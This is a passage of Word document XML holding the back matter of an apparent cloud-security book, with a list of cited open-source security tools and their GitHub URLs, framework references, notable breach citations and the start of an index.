          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>Open-source tools cited</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76739F6B"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CloudFox — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>github.com/BishopFox/cloudfox</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">Pacu — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>github.com/RhinoSecurityLabs/pacu</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">ScoutSuite — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>github.com/nccgroup/ScoutSuite</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">Prowler — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>github.com/prowler-cloud/prowler</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">PMapper — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>github.com/nccgroup/PMapper</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">TruffleHog — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>github.com/trufflesecurity/trufflehog</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">Gitleaks — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>github.com/gitleaks/gitleaks</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">Noseyparker — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>github.com/praetorian-inc/noseyparker</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">S3Scanner — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>github.com/sa7mon/S3Scanner</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">quiet-riot — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>github.com/righteousgambit/quiet-riot</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">Stratus Red Team — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>github.com/DataDog/stratus-red-team</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">Leonidas — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>github.com/WithSecureLabs/leonidas</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">CloudGoat — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>github.com/RhinoSecurityLabs/cloudgoat</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">IAM Vulnerable — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>github.com/BishopFox/iam-vulnerable</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">AWSGoat — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>github.com/ine-labs/AWSGoat</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">TerraGoat — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>github.com/bridgecrewio/terragoat</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">aws-vault — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>github.com/99designs/aws-vault</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">dsnap — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>github.com/RhinoSecurityLabs/dsnap</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">enumerate-iam — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>github.com/andresriancho/enumerate-iam</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CB7BC90" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>Framework references</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FC9C15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MITRE ATT&amp;CK for Cloud (IaaS) matrix, version current at time of writing. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">MITRE ATT&amp;CK for Containers matrix. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">MITRE D3FEND knowledge graph. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">Center for Internet Security, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>AWS Foundations Benchmark</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">Cloud Security Alliance, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>Top Threats to Cloud Computing</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">NIST Special Publication 800-207, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>Zero Trust Architecture</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:br/>
        <w:t>AWS Well-Architected Framework, Security Pillar.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A0B2F6D" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>Notable historical incident analyses</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A2735FF"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Capital One Financial Corporation 2019 breach — SEC filings and US Department of Justice indictment. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">Code Spaces 2014 — public postmortem. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">Uber 2022 — Uber breach disclosure. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">Imperva 2018 — Imperva incident disclosure. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">Scattered Spider / UNC3944 2023-2024 — Mandiant and CISA advisories. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:br/>
        <w:t>MGM Resorts 2023 — public disclosures and follow-up reporting.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D4F69D4" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>Index</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A9BBCF6" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>Entries refer to chapter numbers; sub-entries refer to sections within the chapter.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23AD0621"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Access Analyzer</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> — 7.8, 16.8. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>Access keys</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> — 8.1, 15.1, app B. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>Amplify</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> — 19.3. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>API Gateway</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> — 14.1. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>Athena CTAS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> — 12.5, app A. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>aws-auth ConfigMap</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> — 13.4. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>aws-vault</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> — 18.3. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FD0F4E2"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Backup (AWS Backup)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> — 11.2 note. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>Blast radius</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> — 1.2. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>Bucket policy</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
